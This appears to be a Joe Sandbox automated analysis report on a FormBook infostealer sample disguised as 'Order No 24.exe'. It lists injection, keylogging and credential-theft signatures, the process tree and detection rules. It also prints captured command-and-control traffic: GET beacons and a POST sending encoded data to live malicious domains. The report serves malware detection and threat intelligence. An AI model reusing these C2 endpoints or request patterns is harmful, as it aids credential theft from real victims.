Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Order No 24.exe

Overview

General Information

Sample name:Order No 24.exe
Analysis ID:1557782
MD5:e785b831c8183b40f176d34c36e8ad3e
SHA1:8927f85512b851604e1bb6a44e1e2124b8592381
SHA256:dab3c27ad67888d0202abfd11c7fc17d62d501dd611d6f46756bfefe246b06e5
Tags:exeFormbookuser-lowmal3
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Order No 24.exe (PID: 4412 cmdline: "C:\Users\user\Desktop\Order No 24.exe" MD5: E785B831C8183B40F176D34C36E8AD3E)
    • svchost.exe (PID: 4256 cmdline: "C:\Users\user\Desktop\Order No 24.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • vqiDHNHvZuv.exe (PID: 2184 cmdline: "C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • net.exe (PID: 5544 cmdline: "C:\Windows\SysWOW64\net.exe" MD5: 31890A7DE89936F922D44D677F681A7F)
          • vqiDHNHvZuv.exe (PID: 1468 cmdline: "C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 592 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.4576339259.00000000028E0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.4575842016.0000000000390000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.2300832029.0000000000490000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000002.00000002.2301144839.0000000002D30000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000004.00000002.4577728076.0000000002B80000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.490000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.490000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Order No 24.exe", CommandLine: "C:\Users\user\Desktop\Order No 24.exe", CommandLine|base64offset|contains: 6, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Order No 24.exe", ParentImage: C:\Users\user\Desktop\Order No 24.exe, ParentProcessId: 4412, ParentProcessName: Order No 24.exe, ProcessCommandLine: "C:\Users\user\Desktop\Order No 24.exe", ProcessId: 4256, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Order No 24.exe", CommandLine: "C:\Users\user\Desktop\Order No 24.exe", CommandLine|base64offset|contains: 6, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Order No 24.exe", ParentImage: C:\Users\user\Desktop\Order No 24.exe, ParentProcessId: 4412, ParentProcessName: Order No 24.exe, ProcessCommandLine: "C:\Users\user\Desktop\Order No 24.exe", ProcessId: 4256, ProcessName: svchost.exe

                Suricata Signatures

                No Suricata rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://www.4nk.education/gnvu/Avira URL Cloud: Label: malware
                Source: http://www.4nk.education/gnvu/?bdlD=nxCjiJTB74oIWabUJfF6YI/8fUWqiaBkhoi4dayZTBfl5+e+2r+tNQPR6bJXqR1fUXmtsCJ3OPXRNkZ1wk4Fgjm51oWrqUAojxVNutEIZXbBtNc9Tjm96MrmkoGaIcMHcUdDvgw=&92=DPyPNvf84fs0yXSpAvira URL Cloud: Label: malware
                Source: http://www.migraine-massages.pro/ym43/?bdlD=lxK8zDwlVeZA0KFinmdrczEoh9foX2bLCYsrgBVnd1hBfzxarUrY7JsYsrWqjgtO371UEdIqaCaBOhfuQGtRQscAddRW98P8tCbtJa8oLuk3yqY6cOAnXTMvRpBjAJYE68xAYSo=&92=DPyPNvf84fs0yXSpAvira URL Cloud: Label: malware
                Source: http://www.corpseflowerwatch.org/yjfe/?bdlD=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRZtH+3BcbYh7VvBUTG1QOTnOjymLXFng0zEllYHEl5m4i96WUTr0=&92=DPyPNvf84fs0yXSpAvira URL Cloud: Label: malware
                Source: http://www.migraine-massages.pro/ym43/Avira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: Order No 24.exeReversingLabs: Detection: 34%
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.490000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.490000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.4576339259.00000000028E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4575842016.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2300832029.0000000000490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2301144839.0000000002D30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4577728076.0000000002B80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4580363583.0000000005160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2301597898.0000000003D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4577455340.00000000035C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: Order No 24.exeJoe Sandbox ML: detected
                Source: Order No 24.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: net.pdbUGP source: svchost.exe, 00000002.00000003.2268680902.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2268784841.000000000083B000.00000004.00000020.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000003.00000002.4576582930.0000000000E58000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: vqiDHNHvZuv.exe, 00000003.00000000.2190711391.0000000000CCE000.00000002.00000001.01000000.00000004.sdmp, vqiDHNHvZuv.exe, 00000007.00000002.4576813275.0000000000CCE000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: wntdll.pdbUGP source: Order No 24.exe, 00000000.00000003.2139513122.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, Order No 24.exe, 00000000.00000003.2129931817.0000000003880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2301205113.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2176578979.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2301205113.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2174584549.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000003.2301147253.0000000002B8D000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4578141573.000000000307E000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000004.00000003.2308281410.0000000002D3A000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4578141573.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Order No 24.exe, 00000000.00000003.2139513122.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, Order No 24.exe, 00000000.00000003.2129931817.0000000003880000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2301205113.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2176578979.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2301205113.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2174584549.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, net.exe, net.exe, 00000004.00000003.2301147253.0000000002B8D000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4578141573.000000000307E000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000004.00000003.2308281410.0000000002D3A000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4578141573.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: net.exe, 00000004.00000002.4576398296.0000000002952000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4578877580.000000000350C000.00000004.10000000.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000000.2377314879.0000000002D2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2604417114.000000002CC4C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: net.exe, 00000004.00000002.4576398296.0000000002952000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4578877580.000000000350C000.00000004.10000000.00040000.00000000.sdmp, vqiDHNHvZuv.exe, 00000007.00000000.2377314879.0000000002D2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2604417114.000000002CC4C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: net.pdb source: svchost.exe, 00000002.00000003.2268680902.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2268784841.000000000083B000.00000004.00000020.00020000.00000000.sdmp, vqiDHNHvZuv.exe, 00000003.00000002.4576582930.0000000000E58000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009C6CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_009C6CA9
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009C60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_009C60DD
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009C63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_009C63F9
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009CEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_009CEB60
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009CF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_009CF5FA
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009CF56F FindFirstFileW,FindClose,0_2_009CF56F
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009D1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_009D1B2F
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009D1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_009D1C8A
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009D1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_009D1F94
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_003AC820 FindFirstFileW,FindNextFileW,FindClose,4_2_003AC820
                Source: C:\Windows\SysWOW64\net.exeCode function: 4x nop then xor eax, eax4_2_00399D30
                Source: C:\Windows\SysWOW64\net.exeCode function: 4x nop then mov ebx, 00000004h4_2_02C704E8

                Networking

                barindex
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.066bet.xyz
                Source: Joe Sandbox ViewIP Address: 47.52.221.8 47.52.221.8
                Source: Joe Sandbox ViewIP Address: 128.65.195.180 128.65.195.180
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\Order No 24.exeCode function: 0_2_009D4EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_009D4EB5
                Source: global trafficHTTP traffic detected: GET /yjfe/?bdlD=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRZtH+3BcbYh7VvBUTG1QOTnOjymLXFng0zEllYHEl5m4i96WUTr0=&92=DPyPNvf84fs0yXSp HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.corpseflowerwatch.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /gnvu/?bdlD=nxCjiJTB74oIWabUJfF6YI/8fUWqiaBkhoi4dayZTBfl5+e+2r+tNQPR6bJXqR1fUXmtsCJ3OPXRNkZ1wk4Fgjm51oWrqUAojxVNutEIZXbBtNc9Tjm96MrmkoGaIcMHcUdDvgw=&92=DPyPNvf84fs0yXSp HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.4nk.educationUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /ym43/?bdlD=lxK8zDwlVeZA0KFinmdrczEoh9foX2bLCYsrgBVnd1hBfzxarUrY7JsYsrWqjgtO371UEdIqaCaBOhfuQGtRQscAddRW98P8tCbtJa8oLuk3yqY6cOAnXTMvRpBjAJYE68xAYSo=&92=DPyPNvf84fs0yXSp HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.migraine-massages.proUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /afcr/?92=DPyPNvf84fs0yXSp&bdlD=pxUnB3/JQIgHT0Xru4WA6nCBQFxpXJgMoApNpkZ5FdrdhyTQr+Z8vQ44Z+GGNzyuoe7kishsw1Bs9wd8tp/8BGuo8VlMLN9CkLyFlXp6E4p5ywSBzzNp8Wyc9RtRv/+r7WpQ+fc= HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.pluribiz.lifeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /1iqa/?bdlD=EIYp+2qno3OyA6JRko7EkEQRXSdht8qBodEq6zBYd0MwR3tzbR3TIlddc30TsymXBRZ2l1bBHfxTXhxkRZRQgSz03N/ngXbpk/5Fwdw8cafADp2cf4RIz4iuPQDTbp2HaXJhBs8=&92=DPyPNvf84fs0yXSp HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.kdtzhb.topUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /293d/?92=DPyPNvf84fs0yXSp&bdlD=7bOTn4s4CK+jD9JxCOvk7GPe7C1JF/pOmj70YCSuK3OR6e0KuyF5TSw/saz3rP1zPyqrHIRHHBHNYmPna8SGQfJK7OXgC3z9Q8k+eyxfCNOxpUJEtAyvn1uDuMR9mQoL/1sf57M= HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.evoo.websiteUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /vdvc/?bdlD=5MdYmwdbGD0BDYmaOdq/odi9Xn3PsoNjMQAWnbwvceTCKyge8o8IPCpC1t6KQbJzoNOqWqsbTcqy0exGkczRfKoDXMQfKdBjdSZSECOlFudRAOmJhTFjNLDsmq1e7cQhZ206lWU=&92=DPyPNvf84fs0yXSp HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.astorg-group.infoUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /0m8a/?bdlD=g30HQpd+HgMxFOsvy4fBD4ePDG+xSAfLohG12Vx+WMYj+wKARJtbcOCwopNwAttyOSN3X6k6S6oD2z0+/9dAo/uZsaZcUpkXzlVN358Aa3h3Erj2PbCTGAasKcTxx+6hBqdfcgI=&92=DPyPNvf84fs0yXSp HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.fiqsth.vipUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /ezyn/?bdlD=JlwzIZwI1xJFqouTAqQiGi5FnZJep/DAQQtIf/F0T8wp//PaftbgsqCDWgKyQb/wN3l14QHm5S9DGTsxEdEMKKN8Ow4Y4PJmf6bny7d6dDdcL0boa7lHYjswT0s5aRSMl4VpoSs=&92=DPyPNvf84fs0yXSp HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.bio-thymus.comUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /9ezc/?92=DPyPNvf84fs0yXSp&bdlD=xtzn0DJhGGCFi+NFPE3T6Cy+g21HMhjej1Dx0a13Tc/qv05ju/V7yVyPB0RA699858ofq0RXC37Z8DQM9/J+OZM84GvKl89TQvRVoJIWPcM5zWijXmHfAArwoQ1tIQ9QsTkOWIA= HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.wukong.collegeUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /95c0/?bdlD=0qxxa8sZzaTQGsV+IlYRUJribMqFDMjNP0hPtjDvBTL1oNFysxcHk25mntsLFh1aL6dJocQb44ZX+yLzRXP4XocmoyAxgZDXS9ILoL/richVPo7jE4Ugu66IHT+Zvw5gPpB1yeo=&92=DPyPNvf84fs0yXSp HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.vehiculargustav.clickUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /fjsq/?bdlD=GpZrYQXTa/T8sVztsMzbTqF8lxxIC07IkIuZnLhPq18W1QYyx74IZS8PtaR6C0AcFpyS8tKbrMRis2tA9BeSYA+LY6DfFhY+Crt0zWizEXMfJfu41KYaKDIGSHYliJNf2GNGmHE=&92=DPyPNvf84fs0yXSp HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.yushaliu.onlineUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /ucmb/?92=DPyPNvf84fs0yXSp&bdlD=vlSStPgYi/rw0++s6ZKUsH+lT2dpjOyqKmbfTh2Wh6BCmYHhC9h1DMbb37dpPZ/1mBJsvII6DMGZ/nD5LfnLzkLvWq29n5ve7+0lsSpjEyv7qUGv0unsJnIf6ZDw73FDzrF564s= HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.marketprediction.appUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /yjfe/?bdlD=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRZtH+3BcbYh7VvBUTG1QOTnOjymLXFng0zEllYHEl5m4i96WUTr0=&92=DPyPNvf84fs0yXSp HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Connection: closeHost: www.corpseflowerwatch.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.corpseflowerwatch.org
                Source: global trafficDNS traffic detected: DNS query: www.4nk.education
                Source: global trafficDNS traffic detected: DNS query: www.migraine-massages.pro
                Source: global trafficDNS traffic detected: DNS query: www.vnxoso88.art
                Source: global trafficDNS traffic detected: DNS query: www.pluribiz.life
                Source: global trafficDNS traffic detected: DNS query: www.kdtzhb.top
                Source: global trafficDNS traffic detected: DNS query: www.evoo.website
                Source: global trafficDNS traffic detected: DNS query: www.astorg-group.info
                Source: global trafficDNS traffic detected: DNS query: www.fiqsth.vip
                Source: global trafficDNS traffic detected: DNS query: www.bio-thymus.com
                Source: global trafficDNS traffic detected: DNS query: www.wukong.college
                Source: global trafficDNS traffic detected: DNS query: www.vehiculargustav.click
                Source: global trafficDNS traffic detected: DNS query: www.bulls777.pro
                Source: global trafficDNS traffic detected: DNS query: www.yushaliu.online
                Source: global trafficDNS traffic detected: DNS query: www.marketprediction.app
                Source: global trafficDNS traffic detected: DNS query: www.066bet.xyz
                Source: unknownHTTP traffic detected: POST /gnvu/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Content-Type: application/x-www-form-urlencodedContent-Length: 209Cache-Control: max-age=0Connection: closeHost: www.4nk.educationOrigin: http://www.4nk.educationReferer: http://www.4nk.education/gnvu/User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36Data Raw: 62 64 6c 44 3d 71 7a 71 44 68 39 6e 49 74 74 51 32 62 75 37 53 42 4d 30 4a 54 37 32 62 56 78 47 36 39 37 31 46 2b 2f 4b 6d 62 59 2f 68 64 30 48 4b 37 73 53 6b 76 34 53 34 61 43 4c 48 30 5a 68 74 7a 6a 46 74 43 7a 4f 6c 72 57 68 71 42 73 76 41 53 31 46 4f 77 41 51 6f 73 57 37 61 37 49 47 35 6b 79 4a 53 39 48 55 74 6f 64 77 39 56 6a 50 51 68 2f 73 42 51 54 61 2b 37 50 2b 47 71 2f 76 39 45 75 77 68 63 47 64 4a 68 6b 49 63 4d 59 74 36 75 6e 30 79 37 57 58 45 6f 34 66 51 68 4f 44 56 54 51 73 75 54 47 72 70 4f 49 47 72 70 39 6b 56 42 4e 48 35 32 79 68 52 4e 54 71 44 6c 61 52 50 43 71 4c 64 4d 58 6e 62 6f 4c 75 6f 57 37 55 4a Data Ascii: bdlD=qzqDh9nIttQ2bu7SBM0JT72bVxG6971F+/KmbY/hd0HK7sSkv4S4aCLH0ZhtzjFtCzOlrWhqBsvAS1FOwAQosW7a7IG5kyJS9HUtodw9VjPQh/sBQTa+7P+Gq/v9EuwhcGdJhkIcMYt6un0y7WXEo4fQhODVTQsuTGrpOIGrp9kVBNH52yhRNTqDlaRPCqLdMXnboLuoW7UJ
